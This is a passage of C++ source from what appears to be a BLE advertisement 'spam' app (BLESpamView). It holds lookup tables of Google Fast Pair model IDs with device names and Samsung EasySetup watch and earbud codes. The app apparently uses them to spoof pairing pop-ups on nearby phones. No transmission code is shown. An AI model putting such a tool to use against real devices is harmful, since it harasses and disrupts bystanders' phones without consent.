WF-1000X"}, {0x5CC901, "Sony WF-1000X"}, {0x5CC902, "Sony WH-1000XM2"}, {0x5CC903, "Sony WH-1000XM2"}, {0x5CC904, "Sony WI-1000X"}, {0x5CC905, "Sony WI-1000X"}, {0x5CC906, "Sony WH-1000XM2"}, {0x5CC907, "Sony WH-1000XM2"}, {0x5CC908, "Sony WI-1000X"}, {0x5CC909, "Sony WI-1000X"}, {0x5CC90A, "Sony WH-1000XM3"}, {0x5CC90B, "Sony WH-1000XM3"}, {0x5CC90C, "Sony WH-1000XM3"}, {0x5CC90D, "Sony WH-1000XM3"}, {0x5CC90E, "Sony WI-C600N"}, {0x5CC90F, "Sony WI-C600N"}, {0x5CC910, "Sony WI-C600N"}, {0x5CC911, "Sony WI-C600N"}, {0x5CC912, "Sony WI-C600N"}, {0x5CC913, "Sony WI-C600N"}, {0x5CC914, "Sony WI-SP600N"}, {0x5CC915, "Sony WI-SP600N"}, {0x5CC916, "Sony WI-SP600N"}, {0x5CC917, "Sony WI-SP600N"}, {0x5CC918, "Sony WI-SP600N"}, {0x5CC919, "Sony WI-SP600N"}, {0x5CC91A, "Sony WI-SP600N"}, {0x5CC91B, "Sony WI-SP600N"}, {0x5CC91C, "Sony WI-SP600N"}, {0x5CC91D, "Sony WI-SP600N"}, {0x5CC91E, "Sony WF-SP700N"}, {0x5CC91F, "Sony WF-SP700N"}, {0x5CC920, "Sony WF-SP700N"}, {0x5CC921, "Sony WF-SP700N"}, {0x5CC922, "Sony WF-SP700N"}, {0x5CC923, "Sony WF-SP700N"}, {0x5CC924, "Sony WF-SP700N"}, {0x5CC925, "Sony WF-SP700N"}, {0x5CC926, "Sony WF-SP700N"}, {0x5CC927, "Sony WF-SP700N"}, {0x5CC928, "Sony WH-H900N"}, {0x5CC929, "Sony WH-H900N"}, {0x5CC92A, "Sony WH-H900N"}, {0x5CC92B, "Sony WH-H900N"}, {0x5CC92C, "Sony WH-H900N"}, {0x5CC92D, "Sony WH-H900N"}, {0x5CC92E, "Sony WH-H900N"}, {0x5CC92F, "Sony WH-H900N"}, {0x5CC930, "Sony WH-H900N"}, {0x5CC931, "Sony WH-H900N"}, {0x5CC932, "Sony WH-CH700N"}, {0x5CC933, "Sony WH-CH700N"}, {0x5CC934, "Sony WH-CH700N"}, {0x5CC935, "Sony WH-CH700N"}, {0x5CC936, "Sony WH-CH700N"}, {0x5CC937, "Sony WH-CH700N"}, {0x5CC938, "Sony WF-1000XM3"}, {0x5CC939, "Sony WF-1000XM3"}, {0x5CC93A, "Sony WF-1000XM3"}, {0x5CC93B, "Sony WF-1000XM3"}, {0x5CC93C, "Sony WH-XB700"}, {0x5CC93D, "Sony WH-XB700"}, {0x5CC93E, "Sony WH-XB700"}, {0x5CC93F, "Sony WH-XB700"}, {0x5CC940, "Sony WH-XB900N"}, {0x5CC941, "Sony WH-XB900N"}, {0x5CC942, "Sony WH-XB900N"}, {0x5CC943, "Sony WH-XB900N"}, {0x5CC944, "Sony WH-XB900N"}, {0x5CC945, "Sony WH-XB900N"}, {0x5CEE3C, "Fitbit Charge 4"}, {0x6AD226, "TicWatch Pro 3"}, {0x6B1C64, "Pixel Buds"}, {0x6B8C65, "oraimo FreePods 4"}, {0x6B9304, "Nokia SB-101"}, {0x6BA5C3, "Jabra Elite 4"}, {0x6C42C0, "TWS05"}, {0x6C4DE5, "JBL LIVE PRO 2 TWS"}, {0x718FA4, "JBL LIVE300TWS"}, {0x89BAD5, "Galaxy A23 5G"}, {0x8A31B7, "Bose QC Ultra Headphones"}, {0x8A3D00, "Cleer FLOW Ⅱ"}, {0x8A3D01, "Cleer EDGE Voice"}, {0x8A8F23, "WF-1000XM5"}, {0x8AADAE, "JLab GO Work 2"}, {0x8B0A91, "Jabra Elite 5"}, {0x8B5A7B, "TicWatch Pro 3 GPS"}, {0x8B66AB, "Pixel Buds A-Series"}, {0x8BB0A0, "Nokia Solo Bud+"}, {0x8BF79A, "Oladance Whisper E1"}, {0x8C07D2, "Jabra Elite 4 Active"}, {0x8C1706, "YY7861E"}, {0x8C4236, "GLIDiC mameBuds"}, {0x8C6B6A, "realme Buds Air 3S"}, {0x8CAD81, "KENWOOD WS-A1"}, {0x8CB05C, "JBL LIVE PRO+ TWS"}, {0x8CD10F, "realme Buds Air Pro"}, {0x8D13B9, "BLE-TWS"}, {0x8D16EA, "Galaxy M14 5G"}, {0x8D5B67, "Pixel 90c"}, {0x8E14D7, "LG-TONE-TFP8"}, {0x8E1996, "Galaxy A24 5g"}, {0x8E4666, "Oladance Wearable Stereo"}, {0x8E5550, "boAt Airdopes 511v2"}, {0x9101F0, "Jabra Elite 2"}, {0x9128CB, "TCL MOVEAUDIO Neo"}, {0x913B0C, "YH-E700B"}, {0x915CFA, "Galaxy A14"}, {0x9171BE, "Jabra Evolve2 65 Flex"}, {0x917E46, "LinkBuds"}, {0x91AA00, "Beoplay E8 2.0"}, {0x91AA01, "Beoplay H9 3rd Generation"}, {0x91AA02, "B&O Earset"}, {0x91AA03, "B&O Beoplay H8i"}, {0x91AA04, "Beoplay H4"}, {0x91AA05, "B&O Beoplay E6"}, {0x91BD38, "LG HBS-FL7"}, {0x91C813, "JBL TUNE770NC"}, {0x91DABC, "SRS-XB33"}, {0x92255E, "LG-TONE-FP6"}, {0x989D0A, "Set up your new Pixel 2"}, {0x9939BC, "ATH-SQ1TW"}, {0x994374, "EDIFIER W320TN"}, {0x997B4A, "UA | JBL True Wireless Flash X"}, {0x99C87B, "WH-H810 (h.ear)"}, {0x99D7EA, "oraimo OpenCirclet"}, {0x99F098, "Galaxy S22 Ultra"}, {0x9A408A, "MOTO BUDS 065"}, {0x9A9BDD, "WH-XB910N"}, {0x9ADB11, "Pixel Buds Pro"}, {0x9AEEA4, "LG HBS-FN4"}, {0x9B7339, "AKG N9 Hybrid"}, {0x9B735A, "JBL RFL FLOW PRO"}, {0x9B9872, "Hyundai"}, {0x9BC64D, "JBL TUNE225TWS"}, {0x9BE931, "WI-C100"}, {0x9C0AF7, "JBL VIBE BUDS"}, {0x9C3997, "ATH-M50xBT2"}, {0x9C4058, "JBL WAVE FLEX"}, {0x9C6BC0, "LinkBuds S"}, {0x9C888B, "WH-H910N (h.ear)"}, {0x9C98DB, "JBL TUNE225TWS"}, {0x9CA277, "YY2963"}, {0x9CB5F3, "WH-1000XM5"}, {0x9CB881, "soundcore Motion 300"}, {0x9CD0F3, "LG HBS-TFN7"}, {0x9CE3C7, "EDIFIER NeoBuds Pro 2"}, {0x9CEFD1, "SRS-XG500"}, {0x9CF08F, "JLab Epic Air ANC"}, {0x9D00A6, "Urbanears Juno"}, {0x9D7D42, "Galaxy S20"}, {0x9DB896, "Your BMW"}, {0xA7E52B, "Bose NC 700 Headphones"}, {0xA7EF76, "JBL CLUB PRO+ TWS"}, {0xA8001A, "JBL CLUB ONE"}, {0xA83C10, "adidas Z.N.E. 01"}, {0xA8658F, "ROCKSTER GO"}, {0xA8845A, "oraimo FreePods 4"}, {0xA88B69, "WF-SP800N"}, {0xA8A00E, "Nokia CB-201"}, {0xA8A72A, "JBL LIVE670NC"}, {0xA8C636, "JBL TUNE660NC"}, {0xA8CAAD, "Galaxy F04"}, {0xA8E353, "JBL TUNE BEAM"}, {0xA8F96D, "JBL ENDURANCE RUN 2 WIRELESS"}, {0xA90358, "JBL LIVE220BT"}, {0xA92498, "JBL WAVE BUDS"}, {0xA9394A, "JBL TUNE230NC TWS"}, {0xC6936A, "JBL LIVE PRO+ TWS"}, {0xC69AFD, "WF-H800 (h.ear)"}, {0xC6ABEA, "UA | JBL True Wireless Flash X"}, {0xC6EC5F, "SRS-XE300"}, {0xC7736C, "Philips PH805"}, {0xC79B91, "Jabra Evolve2 75"}, {0xC7A267, "Fake Test Mouse"}, {0xC7D620, "JBL Pulse 5"}, {0xC7FBCC, "JBL VIBE FLEX"}, {0xC8162A, "LinkBuds S"}, {0xC85D7A, "JBL ENDURANCE PEAK II"}, {0xC8777E, "Jaybird Vista 2"}, {0xC878AA, "SRS-XV800"}, {0xC8C641, "Redmi Buds 4 Lite"}, {0xC8D335, "WF-1000XM4"}, {0xC8E228, "Pixel Buds Pro"}, {0xC9186B, "WF-1000XM4"}, {0xC9836A, "JBL Xtreme 4"}, {0xCA7030, "ATH-TWX7"}, {0xCAB6B8, "ATH-M20xBT"}, {0xCAF511, "Jaybird Vista 2"}, {0xCB093B, "Urbanears Juno"}, {0xCB529D, "soundcore Glow"}, {0xCC438E, "WH-1000XM4"}, {0xCC5F29, "JBL TUNE660NC"}, {0xCC754F, "YY2963"}, {0xCC93A5, "Sync"}, {0xCCBB7E, "MIDDLETON"}, {0xCD8256, "Bose NC 700 Headphones"}, {0xD446A7, "WH-1000XM5"}, {0xD5A59E, "Jabra Elite Speaker"}, {0xD5B5F7, "MOTO BUDS 600 ANC"}, {0xD5C6CE, "realme TechLife Buds T100"}, {0xD654CD, "JBL Xtreme 4"}, {0xD65F4E, "Philips Fidelio T2"}, {0xD69B2B, "TONE-T80S"}, {0xD6C195, "LG HBS-SL5"}, {0xD6E870, "Beoplay EX"}, {0xD6EE84, "Rockerz 255 Max"}, {0xD7102F, "ATH-SQ1TW SVN"}, {0xD7E3EB, "Cleer HALO"}, {0xD8058C, "MOTIF II A.N.C."}, {0xD820EA, "WH-XB910N"}, {0xD87A3E, "Pixel Buds Pro"}, {0xD8F3BA, "WH-1000XM5"}, {0xD8F4E8, "realme Buds T100"}, {0xD90617, "Redmi Buds 4 Active"}, {0xD933A7, "JBL ENDURANCE PEAK 3"}, {0xD9414F, "JBL SOUNDGEAR SENSE"}, {0xD97EBA, "JBL TUNE125TWS"}, {0xD9964B, "JBL TUNE670NC"}, {0xDA0F83, "SPACE"}, {0xDA4577, "Jabra Elite 4 Active"}, {0xDA5200, "blackbox TRIP II"}, {0xDAD3A6, "Jabra Elite 10"}, {0xDADE43, "Chromebox"}, {0xDAE096, "adidas RPT-02 SOL"}, {0xDB8AC7, "LG TONE-FREE"}, {0xDBE5B1, "WF-1000XM4"}, {0xDC5249, "WH-H810 (h.ear)"}, {0xDCF33C, "JBL REFLECT MINI NC"}, {0xDD4EC0, "OPPO Enco Air3 Pro"}, {0xDE215D, "WF-C500"}, {0xDE577F, "Teufel AIRY TWS 2"}, {0xDEC04C, "SUMMIT"}, {0xDEDD6F, "soundcore Space One"}, {0xDEE8C0, "Ear (2)"}, {0xDEEA86, "Xiaomi Buds 4 Pro"}, {0xDEF234, "WH-H810 (h.ear)"}, {0xDF01E3, "Sync"}, {0xDF271C, "Big Bang e Gen 3"}, {0xDF42DE, "TAG Heuer Calibre E4 42mm"}, {0xDF4B02, "SRS-XB13"}, {0xDF9BA4, "Bose NC 700 Headphones"}, {0xDFD433, "JBL REFLECT AERO"}, {0xE020C1, "soundcore Motion 300"}, {0xE06116, "LinkBuds S"}, {0xE07634, "OnePlus Buds Z"}, {0xE09172, "JBL TUNE BEAM"}, {0xE4E457, "Galaxy S20 5G"}, {0xE5440B, "TAG Heuer Calibre E4 45mm"}, {0xE57363, "Oladance Wearable Stereo"}, {0xE57B57, "Super Device"}, {0xE5B4B0, "WF-1000XM5"}, {0xE5B91B, "SRS-XB33"}, {0xE5E2E9, "Zone Wireless 2"}, {0xE64613, "JBL WAVE BEAM"}, {0xE64CC6, "Set up your new Pixel 3 XL"}, {0xE69877, "JBL REFLECT AERO"}, {0xE6E37E, "realme Buds Air 5 Pro"}, {0xE6E771, "ATH-CKS50TW"}, {0xE6E8B8, "POCO Pods"}, {0xE750CE, "Jabra Evolve2 75"}, {0xF52494, "JBL LIVE PRO+ TWS"}, {0x000006, "Google Pixel Buds"}, {0x00000A, "Test 00000a - Anti-Spoofing"}, {0x00000C, "Google Gphones"}, {0x000049, "Fast Pair Headphones"}, {0x003001, "Libratone Q Adapt On-Ear"}, {0x003D8A, "Cleer FLOW Ⅱ"}, {0x0052DA, "blackbox TRIP II"}, {0x109201, "Beoplay H9 3rd Generation"}, {0x124366, "BLE-Phone"}, {0x126644, "WH-1000XM4"}, {0x284500, "Plantronics PLT_K2"}, {0x532011, "Big Bang e Gen 3"}, {0x549547, "JBL WAVE BUDS"}, {0x567679, "Pixel Buds Pro"}, {0x575836, "Sony WI-1000X"}, {0x596007, "MOTIF II A.N.C."}, {0x612907, "Redmi Buds 4 Lite"}, {0x614199, "Oraimo FreePods Pro"}, {0x625740, "LG-TONE-NP3"}, {0x641372, "Sony WI-1000X"}, {0x641630, "boAt Airdopes 452"}, {0x664454, "JBL TUNE 520BT"}, {0x706908, "Sony WH-1000XM3"}, {0x837980, "Sony WH-1000XM3"}, {0x855347, "NIRVANA NEBULA"}, {0x861698, "LinkBuds"}, {0xCB2FE7, "soundcore Motion X500"}, }; const uint16_t BLESpamView::fastpairModels_count = COUNT_OF(fastpairModels); // easysetup const BLESpamView::easyU8 BLESpamView::watch_models[] = { {0x1A}, //, "Fallback Watch" {0x01}, //, "White Watch4 Classic 44m" {0x02}, //, "Black Watch4 Classic 40m" {0x03}, //, "White Watch4 Classic 40m" {0x04}, //, "Black Watch4 44mm" {0x05}, //, "Silver Watch4 44mm" {0x06}, //, "Green Watch4 44mm" {0x07}, //, "Black Watch4 40mm" {0x08}, //, "White Watch4 40mm" {0x09}, //, "Gold Watch4 40mm" {0x0A}, //, "French Watch4" {0x0B}, //, "French Watch4 Classic" {0x0C}, //, "Fox Watch5 44mm" {0x11}, //, "Black Watch5 44mm" {0x12}, //, "Sapphire Watch5 44mm" {0x13}, //, "Purpleish Watch5 40mm" {0x14}, //, "Gold Watch5 40mm" {0x15}, //, "Black Watch5 Pro 45mm" {0x16}, //, "Gray Watch5 Pro 45mm" {0x17}, //, "White Watch5 44mm" {0x18}, //, "White & Black Watch5" {0xE4}, //, "Black Watch5 Golf Edition" {0xE5}, //, "White Watch5 Gold Edition" {0x1B}, //, "Black Watch6 Pink 40mm" {0x1C}, //, "Gold Watch6 Gold 40mm" {0x1D}, //, "Silver Watch6 Cyan 44mm" {0x1E}, //, "Black Watch6 Classic 43m" {0x20}, //, "Green Watch6 Classic 43m" {0xEC}, //, "Black Watch6 Golf Edition" {0xEF}, //, "Black Watch6 TB Edition" }; const uint8_t BLESpamView::watch_models_count = 30; const uint8_t BLESpamView::buds_models_count = 20; const BLESpamView::easyU32 BLESpamView::buds_models[] = { {0xEE7A0C}, //, "Fallback Buds" {0x9D1700}, //, "Fallback Dots" {0x39EA48}, //, "Light Purple Buds2" {0xA7C62C}, //, "Bluish Silver Buds2" {0x850116}, //, "Black Buds Live" {0x3D8F41}, //, "Gray & Black Buds2" {0x3B6D02}, //, "Bluish Chrome Buds2" {0xAE063C}, //, "Gray Beige Buds2" {0xB8B905}, //, "Pure White Buds" {0xEAAA17}, //, "Pure White Buds2" {0xD30704}, //, "Black Buds" {0x9DB006}, //, "French Flag Buds" {0x101F1A}, //, "Dark Purple Buds Live" {0x859608}, //, "Dark Blue Buds" {0x8E4503}, //, "Pink Buds" {0x2C6740}, //, "White & Black Buds2" {0x3F6718}, //, "Bronze Buds Live" {0x42C519}, //, "Red Buds Live" {0xAE073A}, //, "Black & White Buds2" {0x011716}, //, "Sleek Black Buds2" }; } // namespace ui::external_app::blespam